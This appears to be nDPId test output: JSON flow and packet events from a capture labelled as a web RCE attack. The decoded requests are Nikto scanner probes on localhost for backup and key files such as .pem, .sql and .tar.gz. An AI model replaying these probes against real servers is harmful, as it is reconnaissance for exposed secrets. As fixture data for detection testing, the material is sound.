+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 